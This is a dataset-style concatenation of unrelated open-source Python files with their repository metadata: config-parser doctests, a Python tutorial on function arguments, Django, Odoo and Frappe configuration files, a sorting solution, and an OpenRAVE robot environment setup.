AssertionError: Compiler name name-does-not-exist not found
>>> configstr = \\
... '[ground_truth]\\n' \\
... 'compiler_name = \\'another-name-that-does-not-exist\\'\\n'
>>> runconfig(configstr)
Traceback (most recent call last):
...
AssertionError: Compiler name another-name-that-does-not-exist not found
>>> runconfig('[compiler]\\n')
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml improperly configured, needs [[compiler]] section
>>> runconfig('[[compiler]]\\n')
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: compiler "{}" is missing the "name" field
>>> runconfig('[[compiler]]\\n'
... 'name = \\'hello\\'\\n')
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: compiler "{'name': 'hello'}" is missing the "type" field
>>> runconfig('[[compiler]]\\n'
... 'name = \\'hello\\'\\n'
... 'type = \\'gcc\\'\\n') # doctest:+ELLIPSIS
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: compiler "{...}" is missing the "binary" field
>>> runconfig('[[compiler]]\\n'
... 'binary = \\'my-special-compiler\\'\\n'
... 'name = \\'hello\\'\\n'
... 'type = \\'my-unsupported-type\\'\\n')
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: unsupported compiler type "my-unsupported-type"
>>> runconfig('[[compiler]]\\n'
... 'binary = \\'gcc\\'\\n'
... 'name = \\'gcc\\'\\n'
... 'type = \\'gcc\\'\\n'
... '\\n'
... '[[compiler]]\\n'
... 'binary = \\'gcc-2\\'\\n'
... 'name = \\'gcc-2\\'\\n'
... 'type = \\'gcc\\'\\n'
... )
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: cannot have multiple compilers of the same type (gcc)
>>> runconfig('[[compiler]]\\n'
... 'binary = \\'gcc\\'\\n'
... 'name = \\'gcc\\'\\n'
... 'type = \\'gcc\\'\\n'
... '\\n'
... '[[compiler]]\\n'
... 'binary = \\'gcc-2\\'\\n'
... 'name = \\'gcc\\'\\n'
... 'type = \\'clang\\'\\n'
... )
Traceback (most recent call last):
...
tst_common_funcs.UpdateTestError: Failed to update Makefile: Error: flit-config.toml: cannot have multiple compilers of the same name (gcc)
'''
# Test setup before the docstring is run.
import sys
before_path = sys.path[:]
sys.path.append('../..')
import test_harness as th
sys.path = before_path
if __name__ == '__main__':
from doctest import testmod
failures, tests = testmod()
sys.exit(failures)
| [
"mikebentley15@gmail.com"
] | mikebentley15@gmail.com |
b255fdf34e22a4165490cdca3b6a1c6e64f12f1d | 8d2a124753905fb0455f624b7c76792c32fac070 | /pytnon-month01/month01-shibw-notes/day08-shibw/demo02-函数实参传递方式.py | 8552c39f1fd88ff02da5f27af317be220d475eb2 | [] | no_license | Jeremy277/exercise | f38e4f19aae074c804d265f6a1c49709fd2cae15 | a72dd82eb2424e4ae18e2f3e9cc66fc4762ec8fa | refs/heads/master | 2020-07-27T09:14:00.286145 | 2019-09-17T11:31:44 | 2019-09-17T11:31:44 | 209,041,629 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,069 | py | '''
函数传参
实参传递方式
'''
def fun01(a,b,c):#形参 a b c
print(a)
print(b)
print(c)
#位置实参 实参是根据位置与形参对应的
#如果实参位置发生改变 会影响函数结果
# fun01(10,20,30)
# fun01(30,10,20)
#序列实参 用*将序列中的元素拆开然后与形参依次对应
#序列 字符串 列表 元组
list01 = [10,20,30]
fun01(*list01)
# str01 = 'abcd'
# fun01(*str01)#报错
#关键字实参
#实参的值与形参的名称对应
# fun01(a=10,b=20,c=30)
#使用关键字实参 传参的顺序可以不固定
# fun01(c=30,a=10,b=20)
# fun01(a=10,b=20,d=40)#错误
#字典实参 使用**将字典拆开,字典中的键值对以关键字的形式进行对应,传递值
dict01 = {'a':10,'b':20,'c':30}
# a = 10 , b = 20 ,c = 30
fun01(**dict01)
#字典中的键的名字要与形参名对应
# dict01 = {'a':10,'e':20,'d':30}
# fun01(**dict01)#报错
# 混合使用
# 语法规定 先写位置参数 再写关键字参数
# fun01(10,20,c=30)
# fun01(c=30,b=20,10)#报错
# fun01(10,c=30,b=20)
| [
"13572093824@163.com"
] | 13572093824@163.com |
4153e5a0a7053f1238faf6b9925f4b00dfa351d3 | 3f4f2bb867bf46818802c87f2f321a593f68aa90 | /smile/bin/cftp | f013e4cd473d18741239a41ee15b8ee6fe9ecd80 | [] | no_license | bopopescu/Dentist | 56f5d3af4dc7464544fbfc73773c7f21a825212d | 0122a91c1f0d3d9da125234a8758dea802cd38f0 | refs/heads/master | 2022-11-23T12:42:23.434740 | 2016-09-19T15:42:36 | 2016-09-19T15:42:36 | 282,608,405 | 0 | 0 | null | 2020-07-26T08:30:16 | 2020-07-26T08:30:16 | null | UTF-8 | Python | false | false | 358 | #!/SHARED-THINGS/ONGOING/We.smile/smile/bin/python
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
import sys, os
extra = os.path.dirname(os.path.dirname(sys.argv[0]))
sys.path.insert(0, extra)
try:
import _preamble
except ImportError:
sys.exc_clear()
sys.path.remove(extra)
from twisted.conch.scripts.cftp import run
run()
| [
"jamaalaraheem@gmail.com"
] | jamaalaraheem@gmail.com | |
60899e33a7c3f1dfccf1acbed4b358ea6a036956 | bf8b1335af2d9b77943d440908be1f94931493c9 | /lession3/jinja/jinja/wsgi.py | 177b069f883f281c7c4f2fba4e1f18e96fcb2df2 | [] | no_license | OctopusLian/django-lession | 9e8e6727815f30ad79972aee956055d7c01c9692 | 8f6f88c53702884c99fc0c6048c1019735f16fd3 | refs/heads/master | 2023-06-05T22:01:09.298618 | 2021-06-24T07:45:44 | 2021-06-24T07:45:44 | 377,732,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 387 | py | """
WSGI config for jinja project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'jinja.settings')
application = get_wsgi_application()
| [
"zoctopus@qq.com"
] | zoctopus@qq.com |
c0aad22b53d52c82359598c5146e7be5d057ac21 | ac8785aab837876a7595925cba2b5a09d6cb3a9f | /exam_question/apps.py | f7eca37bf7588c1f5bc88337e80ceb855a725f55 | [] | no_license | MayowaFunmi/django-cbt-onlineschool-app | 9ffb388baec9515314035b7cf1faeae60006df66 | f98741a299303643fa58a8f98aff0ab885402404 | refs/heads/master | 2023-01-02T08:52:51.570801 | 2020-10-28T00:09:30 | 2020-10-28T00:09:30 | 307,857,845 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | from django.apps import AppConfig
class ExamQuestionConfig(AppConfig):
name = 'exam_question'
| [
"akinade.mayowa@gmail.com"
] | akinade.mayowa@gmail.com |
ee3a35c8ea73fb5fd4cbd78944d7dd7318dfa7b2 | eb9f655206c43c12b497c667ba56a0d358b6bc3a | /python/helpers/pydev/pydev_tests_python/resources/_debugger_case_set_next_statement.py | 145f36d596c3dbca63ea3726dfa41035f960a000 | [
"EPL-1.0",
"Apache-2.0"
] | permissive | JetBrains/intellij-community | 2ed226e200ecc17c037dcddd4a006de56cd43941 | 05dbd4575d01a213f3f4d69aa4968473f2536142 | refs/heads/master | 2023-09-03T17:06:37.560889 | 2023-09-03T11:51:00 | 2023-09-03T12:12:27 | 2,489,216 | 16,288 | 6,635 | Apache-2.0 | 2023-09-12T07:41:58 | 2011-09-30T13:33:05 | null | UTF-8 | Python | false | false | 169 | py | def method():
a = 1
print('call %s' % (a,))
a = 2
print('call %s' % (a,))
a = 3
if __name__ == '__main__':
method()
print('TEST SUCEEDED!')
| [
"Elizaveta.Shashkova@jetbrains.com"
] | Elizaveta.Shashkova@jetbrains.com |
1da139e0f1926e0aebc7e93d592604dcfb4edf72 | 8d920a35fda0ba351a6fb5e7d6cb2b570d6f1ec6 | /grp_ejecucion_presupuestal/__openerp__.py | 21ef1b0627f49b703a741c5e18df87a2f6e4ca67 | [] | no_license | suningwz/odoo-coreuy | afeb661a1c6bd16e7804f2bd7df9ebe9dda7bab8 | d723860324e3d914a0a44bac14dd83eceefc96fe | refs/heads/master | 2020-09-14T22:43:17.884212 | 2019-07-03T13:48:50 | 2019-07-03T13:48:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,555 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Enterprise Management Solution
# GRP Estado Uruguay
# Copyright (C) 2017 Quanam (ATEL SA., Uruguay)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'GRP - Ejecución presupuestal SIIF',
'version': '1.0',
'author': 'Quanam',
'website': 'www.quanam.com',
'category': '',
'images': [],
'depends': ['grp_factura_siif'],
'description': """
GRP - Vista ejecución presupuestal SIIF años futuros
""",
'demo': [],
'data': [
'security/ir.model.access.csv',
'report/grp_ejecucion_presupuestal_siif_view.xml',
'report/grp_ejecucion_presupuestal_siif_documentos_view.xml',
],
'installable': True,
'auto_install': False,
}
| [
"lcontreras@sofis.com.uy"
] | lcontreras@sofis.com.uy |
cf72b166ab3a1fcf4523e0f20acf976d34f5e402 | ab8187626aa68c1f92301db78e9f8b0c4b088554 | /TwoPointer/75_h.py | a8a07b4bde84c80b9ccb625d2074edf0ebb7ed68 | [] | no_license | khj68/algorithm | 2818f87671019f9f2305ec761fd226e737f12025 | efebe142b9b52e966e0436be3b87fb32b4f7ea32 | refs/heads/master | 2023-04-25T02:33:13.403943 | 2021-05-04T03:09:38 | 2021-05-04T03:09:38 | 287,733,041 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | class Solution:
def sortColors(self, nums: List[int]) -> None:
"""
Do not return anything, modify nums in-place instead.
"""
zeroP, twoP = 0, len(nums)-1
i = 0
while i <= twoP:
try:
while nums[zeroP] == 0: zeroP += 1
while nums[twoP] == 2: twoP -= 1
except:
print('error')
return
# print(zeroP, twoP)
if nums[i] == 0 and i > zeroP:
nums[i], nums[zeroP] = nums[zeroP], nums[i]
elif nums[i] == 2 and i < twoP:
nums[i], nums[twoP] = nums[twoP], nums[i]
else:
i += 1
| [
"maga40@naver.com"
] | maga40@naver.com |
51b14fca6562f512f53b9bd7533a151120bba916 | 128090f08a541eaf52a39bd811147e16fbcd2ef5 | /certificate/hooks.py | 9fd93618a5e0d2acdf2aa4969765c66f2e5bb01a | [
"MIT"
] | permissive | hrgadeha/certificate | e92d420773d2bdfafa641fb1239a38f21db54ee4 | b742679f0002f63a6afd4950b9f20903f9c8dc4b | refs/heads/master | 2020-03-31T12:59:00.530854 | 2018-10-23T07:13:23 | 2018-10-23T07:13:23 | 152,236,987 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,849 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
app_name = "certificate"
app_title = "Certificate"
app_publisher = "Hardik Gadesha"
app_description = "Custom Certificate for Employee and Company"
app_icon = "octicon octicon-file-directory"
app_color = "grey"
app_email = "hardikgadesha@gmail.com"
app_license = "MIT"
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/certificate/css/certificate.css"
# app_include_js = "/assets/certificate/js/certificate.js"
# include js, css files in header of web template
# web_include_css = "/assets/certificate/css/certificate.css"
# web_include_js = "/assets/certificate/js/certificate.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "certificate.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "certificate.install.before_install"
# after_install = "certificate.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "certificate.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
# doc_events = {
# "*": {
# "on_update": "method",
# "on_cancel": "method",
# "on_trash": "method"
# }
# }
# Scheduled Tasks
# ---------------
scheduler_events = {
"cron": {
"0 0 * * *": [
"certificate.certificate.doctype.certificate.certificate.emp_cert_mail",
"certificate.certificate.doctype.certificate.certificate.company_cert_mail"
]
}
}
# Testing
# -------
# before_tests = "certificate.install.before_tests"
# Overriding Whitelisted Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "certificate.event.get_events"
# }
| [
"you@example.com"
] | you@example.com |
cf52e79ed7afa2539ea55264e23fcd537bac3203 | 5ff50855146d8519457903fecebaf6f9f534b6ed | /gtamp_problem_environments/mover_environment_definition.py | c4cc0d8ff00ecfebb7c48333e1bb2a8678372d3a | [] | no_license | lukeshimanuki/guiding_gtamp_light | 9bc5f3a2b97d2bb16f3d47b5bc4b1280fc591d6f | 651061a400aca998b3a3a85ea8030b2c5432552a | refs/heads/master | 2023-01-13T05:52:57.170550 | 2020-07-01T01:07:33 | 2020-07-01T01:07:33 | 256,593,351 | 0 | 0 | null | 2020-04-17T19:37:04 | 2020-04-17T19:37:03 | null | UTF-8 | Python | false | false | 25,645 | py | import sys
# from manipulation.constants import PARALLEL_LEFT_ARM, REST_LEFT_ARM, HOLDING_LEFT_ARM, FOLDED_LEFT_ARM, \
# FAR_HOLDING_LEFT_ARM, LOWER_TOP_HOLDING_LEFT_ARM, REGION_Z_OFFSET
from gtamp_utils.utils import *
from gtamp_utils import utils
from manipulation.bodies.bodies import place_body, place_body_on_floor
from manipulation.primitives.transforms import set_point
from manipulation.regions import create_region, AARegion
import os
import random
# obj definitions
min_height = 0.4
max_height = 1
min_width = 0.2
max_width = 0.6
min_length = 0.2
max_length = 0.6
OBST_COLOR = (1, 0, 0)
OBST_TRANSPARENCY = .25
N_OBJS = 10
def generate_rand(min, max):
return np.random.rand() * (max - min) + min
def create_objects(env, obj_region, n_objects):
OBJECTS = []
obj_shapes = {}
obj_poses = {}
for i in range(n_objects):
width = np.random.rand(1) * (max_width - min_width) + min_width
length = np.random.rand(1) * (max_width - min_length) + min_length
height = np.random.rand(1) * (max_height - min_height) + min_height
new_body = box_body(env, width, length, height,
name='obj%s' % i,
color=(0, (i + .5) / n_objects, 0))
trans = np.eye(4)
trans[2, -1] = 0.075
env.Add(new_body)
new_body.SetTransform(trans)
obj_pose = randomly_place_region(new_body, obj_region) # TODO fix this to return xytheta
OBJECTS.append(new_body)
obj_shapes['obj%s' % i] = [width[0], length[0], height[0]]
obj_poses['obj%s' % i] = obj_pose
return OBJECTS, obj_poses, obj_shapes
def load_objects(env, obj_shapes, obj_poses, color):
# sets up the object at their locations in the original env
OBJECTS = []
i = 0
nobj = len(obj_shapes.keys())
for obj_name in obj_shapes.keys():
obj_xyz = obj_poses[obj_name]['obj_xyz']
obj_rot = obj_poses[obj_name]['obj_rot']
width, length, height = obj_shapes[obj_name]
new_body = box_body(env, width, length, height,
name=obj_name,
color=np.array(color) / float(nobj - i))
i += 1
env.Add(new_body)
set_point(new_body, obj_xyz)
set_quat(new_body, obj_rot)
OBJECTS.append(new_body)
return OBJECTS
def create_bottom_walls(x_lim, y_lim, env):
bottom_wall = box_body(env, x_lim * 2, y_lim * 2, 0.135, name='bottom_wall', color=(.82, .70, .55))
bottom_wall_x = x_lim / 2.0
set_xy(bottom_wall, bottom_wall_x, 0)
env.Add(bottom_wall)
side_wall = box_body(env, y_lim * 2, 0.01 * 2, 0.2 * 2,
name='side_wall_1',
color=(.82, .70, .55))
place_body(env, side_wall, (-x_lim + bottom_wall_x, 0, np.pi / 2), base_name='bottom_wall')
side_wall = box_body(env, y_lim * 2, 0.01 * 2, 0.2 * 2,
name='side_wall_2',
color=(.82, .70, .55))
place_body(env, side_wall, (x_lim + bottom_wall_x, 0, np.pi / 2), base_name='bottom_wall')
side_wall = box_body(env, x_lim * 2, 0.01 * 2, 0.2 * 2,
name='side_wall_3',
color=(.82, .70, .55))
place_body(env, side_wall, (bottom_wall_x, y_lim, 0), base_name='bottom_wall')
entrance_width = 1.2
left_door_length = (x_lim - entrance_width / 2.0) - 1
right_door_length = (x_lim - entrance_width / 2.0) + 1
entrance_left = box_body(env, left_door_length, 0.01 * 2, 0.2 * 2,
name='entrance_left',
color=(.82, .70, .55))
entrance_right = box_body(env, right_door_length, 0.01 * 2, 0.2 * 2,
name='entrance_right',
color=(.82, .70, .55))
place_body(env, entrance_left, (bottom_wall_x + (-x_lim - (entrance_width / 2.0 + 1)) / 2.0, -y_lim, 0),
base_name='bottom_wall')
place_body(env, entrance_right, (bottom_wall_x + (x_lim + (entrance_width / 2.0 - 1)) / 2.0, -y_lim, 0),
base_name='bottom_wall')
# place_body(env, env.GetKinBody('Cabinet'), (x_lim + x_lim / 3.0 - 0.5, y_lim - 3, np.pi), base_name='bottom_wall')
def create_doors(x_lim, y_lim, door_x, door_y, door_width, th, env):
if th == 0:
right_wall_size = (door_y - door_width / 2.0 - (-y_lim)) / 2.0
left_wall_size = (y_lim - door_width / 2.0 - door_y) / 2.0
elif th == np.pi / 2.:
right_wall_size = (door_x - door_width / 2.0 - (-x_lim)) / 2.0
left_wall_size = (x_lim - door_width / 2.0 - door_x) / 2.0
left_wall = box_body(env,
0.04 * 2, left_wall_size * 2, 1 * 2,
name='left_wall',
color=(.82, .70, .55))
right_wall = box_body(env,
0.04 * 2, right_wall_size * 2, 1 * 2,
name='right_wall',
color=(.82, .70, .55))
if th == 0:
place_body(env, left_wall, (door_x, door_y + left_wall_size + (door_width / 2.), th),
base_name='bottom_wall')
place_body(env, right_wall, (door_x, door_y - right_wall_size - (door_width / 2.), th),
base_name='bottom_wall')
else:
place_body(env, left_wall, (door_x + left_wall_size + (door_width / 2.), door_y, th),
base_name='bottom_wall')
place_body(env, right_wall, (door_x - right_wall_size - (door_width / 2.), door_y, th),
base_name='bottom_wall')
set_body_transparency(left_wall, 0.3)
set_body_transparency(right_wall, 0.3)
def create_box_bodies(body_shape, color, name, n_objs, env):
if color == 'green':
box_bodies = [box_body(env, body_shape[i][0], body_shape[i][1], body_shape[i][2], name=name + '%s' % i,
color=(1, (i + .5) / 5, 0)) for i in range(n_objs)]
elif color == 'red':
box_bodies = [box_body(env, body_shape[i][0], body_shape[i][1], body_shape[i][2], name=name + '%s' % i,
color=((i + .5) / 5, 0, 1)) for i in range(n_objs)]
elif color == 'blue':
box_bodies = [box_body(env, body_shape[i][0], body_shape[i][1], body_shape[i][2], name=name + '%s' % i,
color=(0, 1, (i + .5) / 5)) for i in range(n_objs)]
return box_bodies
def generate_shelf_shapes():
max_shelf_width = 0.7
min_shelf_width = 0.4
right_shelf_width = generate_rand(min_shelf_width, max_shelf_width)
left_shelf_width = generate_rand(min_shelf_width, max_shelf_width)
left_shelf_height = generate_rand(0.3, 0.5)
left_shelf_top_height = generate_rand(0.3, 0.5)
right_shelf_height = generate_rand(0.3, 0.5)
right_shelf_top_height = generate_rand(0.3, 0.5)
center_shelf_width = 1 # generate_rand(min_shelf_width, max_shelf_width) # np.random.rand(0.5,0.8)
center_shelf_height = 0.26 # generate_rand(0.3, 0.5)
center_shelf_top_height = 0.7 # generate_rand(0.3, 0.5)
shelf_shapes = {'center_shelf_top_height': center_shelf_top_height,
'center_shelf_height': center_shelf_height,
'left_shelf_top_height': left_shelf_top_height,
'left_shelf_height': left_shelf_height,
'right_shelf_top_height': right_shelf_top_height,
'right_shelf_height': right_shelf_height,
'center_shelf_width': center_shelf_width,
'left_shelf_width': left_shelf_width,
'right_shelf_width': right_shelf_width}
left_x = center_shelf_width / 2.0 + left_shelf_width / 2.0
right_x = -center_shelf_width / 2.0 - right_shelf_width / 2.0 # center of left shelf
shelf_xs = {
'left_x': left_x,
'right_x': right_x
}
return shelf_shapes, shelf_xs
def create_shelf(env, obst_x, obst_width, obst_height, name_idx, stacked_obj_name, table_name):
width = 0.25
length = 0.01
height = obst_height
top_wall_width = 0.001
bottom_wall_width = 0.0001
table_pos = aabb_from_body(env.GetKinBody(table_name)).pos()
table_x = table_pos[0] - 0.18
table_y = table_pos[1]
place_body(env,
box_body(env,
width, length, height,
name='right_wall_' + str(name_idx),
color=OBST_COLOR,
transparency=OBST_TRANSPARENCY),
(table_x + .0, table_y + obst_x - (obst_width - .05) / 2, 0),
stacked_obj_name)
place_body(env,
box_body(env,
width, length, height,
name='left_wall_' + str(name_idx),
color=OBST_COLOR,
transparency=OBST_TRANSPARENCY),
(table_x + .0, table_y + obst_x + (obst_width - .05) / 2, 0),
stacked_obj_name)
place_body(env,
box_body(env,
length, obst_width - 0.05, height,
name='back_wall_' + str(name_idx),
color=OBST_COLOR,
transparency=OBST_TRANSPARENCY),
(table_x + .225, table_y + obst_x, 0),
stacked_obj_name)
place_body(env,
box_body(env,
width, obst_width - 0.05, top_wall_width,
name='top_wall_' + str(name_idx),
color=OBST_COLOR,
transparency=OBST_TRANSPARENCY),
(table_x + 0, table_y + obst_x, 0),
'back_wall_' + str(name_idx))
if name_idx == 1:
place_body(env,
box_body(env,
width, obst_width - 0.05, bottom_wall_width,
name='bottom_wall_' + str(name_idx),
color=OBST_COLOR,
transparency=0.5),
(table_x + 0, table_y + obst_x, 0),
stacked_obj_name)
if name_idx == 1:
region = create_region(env, 'place_region_' + str(name_idx),
((-1.0, 1.0), (-0.85, 0.85)),
'bottom_wall_' + str(name_idx), color=np.array((0, 0, 0, .5)))
# viewer()
# region.draw(env)
return region
# remove region name entity_names
def set_fixed_object_poses(env, x_lim, y_lim):
objects = [env.GetKinBody('shelf1'), env.GetKinBody('shelf2'), env.GetKinBody('computer_table'),
env.GetKinBody('table2')]
place_body(env, env.GetKinBody('shelf1'), (x_lim + x_lim / 2.0 - 0.5, y_lim - 0.2, np.pi * 3 / 2),
base_name='bottom_wall')
place_body(env, env.GetKinBody('shelf2'), (x_lim + x_lim / 2.0 - 1.5, y_lim - 0.2, np.pi * 3 / 2),
base_name='bottom_wall')
place_body(env, env.GetKinBody('table2'), (x_lim + x_lim / 2.0 - 0.5, y_lim - 3, np.pi * 3 / 2),
base_name='bottom_wall')
place_body(env, env.GetKinBody('computer_chair'), (4.2, -1.5, 0), base_name='bottom_wall')
obj_poses = {obj.GetName(): get_pose(obj) for obj in objects}
return obj_poses
def create_shelves(env, shelf_shapes, shelf_xs, table_name):
center_shelf_width = shelf_shapes['center_shelf_width']
center_shelf_height = shelf_shapes['center_shelf_height']
center_shelf_top_height = shelf_shapes['center_shelf_top_height']
# left_shelf_width = shelf_shapes['left_shelf_width']
# left_shelf_height = shelf_shapes['left_shelf_height']
# left_shelf_top_height = shelf_shapes['left_shelf_top_height']
# right_shelf_width = shelf_shapes['right_shelf_width']
# right_shelf_height = shelf_shapes['right_shelf_height']
# right_shelf_top_height = shelf_shapes['right_shelf_top_height']
left_x = shelf_xs['left_x']
right_x = shelf_xs['right_x']
center_region = create_shelf(env, obst_x=0, obst_width=center_shelf_width,
obst_height=center_shelf_height, name_idx=1, stacked_obj_name=table_name,
table_name=table_name)
center_top_region = create_shelf(env, obst_x=0, obst_width=center_shelf_width,
obst_height=center_shelf_top_height, name_idx=2,
stacked_obj_name='back_wall_1', table_name=table_name)
"""
left_region = create_shelf(env, obst_x=left_x, obst_width=left_shelf_width,
obst_height=left_shelf_height, name_idx=3, stacked_obj_name=table_name,
table_name=table_name)
left_top_region = create_shelf(env, obst_x=left_x, obst_width=left_shelf_width,
obst_height=left_shelf_top_height, name_idx=4,
stacked_obj_name='back_wall_3', table_name=table_name)
right_region = create_shelf(env, obst_x=right_x, obst_width=right_shelf_width,
obst_height=right_shelf_height, name_idx=5, stacked_obj_name=table_name,
table_name=table_name)
right_top_region = create_shelf(env, obst_x=right_x, obst_width=right_shelf_width,
obst_height=right_shelf_top_height, name_idx=6,
stacked_obj_name='back_wall_5', table_name=table_name)
"""
# regions = {'center': center_region, 'center_top': center_top_region,
# 'left': left_region, 'left_top': left_top_region}
# 'right': right_region, 'right_top': right_top_region}
# regions = {'center': center_region, 'center_top': center_top_region}
regions = {'center': center_region}
return regions
def generate_shelf_obj_shapes():
max_obj_height = 0.25
min_obj_height = 0.15
same_height = 0.20
l_obj_shapes = [[0.05, 0.05, same_height] for _ in range(N_OBJS)]
ltop_obj_shapes = [[0.05, 0.05, same_height] for _ in range(N_OBJS)]
c_obj_shapes = [[0.05, 0.05, same_height] for _ in range(N_OBJS)]
ctop_obj_shapes = [[0.05, 0.05, same_height] for _ in range(N_OBJS)]
r_obj_shapes = [[0.05, 0.05, same_height] for _ in range(N_OBJS)]
rtop_obj_shapes = [[0.05, 0.05, same_height] for _ in range(N_OBJS)]
obj_shapes = {'l_obj_shapes': l_obj_shapes, 'ltop_obj_shapes': ltop_obj_shapes,
'c_obj_shapes': c_obj_shapes, 'ctop_obj_shapes': ctop_obj_shapes,
'r_obj_shapes': r_obj_shapes, 'rtop_obj_shapes': rtop_obj_shapes}
return obj_shapes
def create_shelf_objs(env, obj_shapes):
# left_objs = create_box_bodies(obj_shapes['l_obj_shapes'], color='green', name='l_obst', n_objs=n_objs,
# env=env)
# left_top_objs = create_box_bodies(obj_shapes['ltop_obj_shapes'], color='green', name='ltop_obst',
# n_objs=n_objs, env=env)
center_objs = create_box_bodies(obj_shapes['c_obj_shapes'], color='blue', name='c_obst', n_objs=N_OBJS, env=env)
# center_top_objs = create_box_bodies(obj_shapes['ctop_obj_shapes'], color='blue', name='ctop_obst', n_objs=N_OBJS,
# env=env)
# right_objs = create_box_bodies(obj_shapes['r_obj_shapes'], color='red', name='r_obst',
# n_objs=n_objs, env=env)
# right_top_objs = create_box_bodies(obj_shapes['rtop_obj_shapes'], color='red', name='rtop_obst',
# n_objs=n_objs, env=env)
# objects = { # 'left': left_objs, 'left_top': left_top_objs,
# 'center': center_objs, 'center_top': center_top_objs,
# 'right': right_objs, 'right_top': right_top_objs}
# objects = {'center': center_objs, 'center_top': center_top_objs}
objects = {'center': center_objs}
return objects
def place_objs_in_region(objs, region, env):
for obj in objs:
randomly_place_region(obj, region)
def generate_poses_and_place_shelf_objs(objects, regions, env):
"""
left_objs = objects['left']
left_region = regions['left']
left_top_objs = objects['left_top']
left_top_region = regions['left_top']
right_objs = objects['right']
right_region = regions['right']
right_top_objs = objects['right_top']
right_top_region = regions['right_top']
"""
center_objs = objects['center']
center_region = regions['center']
# center_top_objs = objects['center_top']
# center_top_region = regions['center_top']
# place_objs_in_region(left_objs, left_region, env)
# place_objs_in_region(left_top_objs, left_top_region, env)
# place_objs_in_region(right_objs, right_region, env)
# place_objs_in_region(right_top_objs, right_top_region, env)
place_objs_in_region(center_objs, center_region, env)
# place_objs_in_region(center_top_objs, center_top_region, env)
obj_poses = {obj.GetName(): get_pose(obj) for obj_list in objects.values() for obj in obj_list}
return obj_poses
def set_fixed_obj_poses(env):
table1 = env.GetKinBody('table1')
shelf = env.GetKinBody('shelf1')
def create_environment_region(name, xy, extents, z=None):
if z is None:
z = 0.138
region = AARegion(name, ((xy[0] - extents[0],
xy[0] + extents[0]),
(xy[1] - extents[1],
xy[1] + extents[1])),
z, color=np.array((1, 1, 0, 0.25)))
return region
class MoverEnvironmentDefinition:
def __init__(self, env):
x_extents = 3.5
y_extents = 3.16
door_width = 1.5 # generate_rand(1, 1.5)
door_x = (-x_extents + 1.5 + x_extents - 1.5) / 2.0 - x_extents * 0.3 + 4
door_y = (-y_extents + 1.5 + y_extents - 1.5) / 2.0
door_th = 0
# todo move all the kitchen objects by 0.5
fdir = os.path.dirname(os.path.abspath(__file__))
env.Load(fdir + '/resources/mover_env.xml')
# set_xy(env.GetKinBody('kitchen'), 0, 0.5)
robot = env.GetRobots()[0]
# left arm IK
robot.SetActiveManipulator('leftarm')
manip = robot.GetActiveManipulator()
ee = manip.GetEndEffector()
ikmodel1 = databases.inversekinematics.InverseKinematicsModel(robot=robot,
iktype=IkParameterization.Type.Transform6D,
forceikfast=True, freeindices=None,
freejoints=None, manip=None)
if not ikmodel1.load():
ikmodel1.autogenerate()
# right arm torso IK
robot.SetActiveManipulator('rightarm_torso')
manip = robot.GetActiveManipulator()
ee = manip.GetEndEffector()
ikmodel2 = databases.inversekinematics.InverseKinematicsModel(robot=robot,
iktype=IkParameterization.Type.Transform6D)
# forceikfast=True, freeindices=None,
# freejoints=None, manip=None)
if not ikmodel2.load():
ikmodel2.autogenerate()
create_bottom_walls(x_extents, y_extents, env)
create_doors(x_extents, y_extents, door_x, door_y, door_width, door_th, env)
set_config(robot, FOLDED_LEFT_ARM, robot.GetManipulator('leftarm').GetArmIndices())
set_config(robot, mirror_arm_config(FOLDED_LEFT_ARM), robot.GetManipulator('rightarm').GetArmIndices())
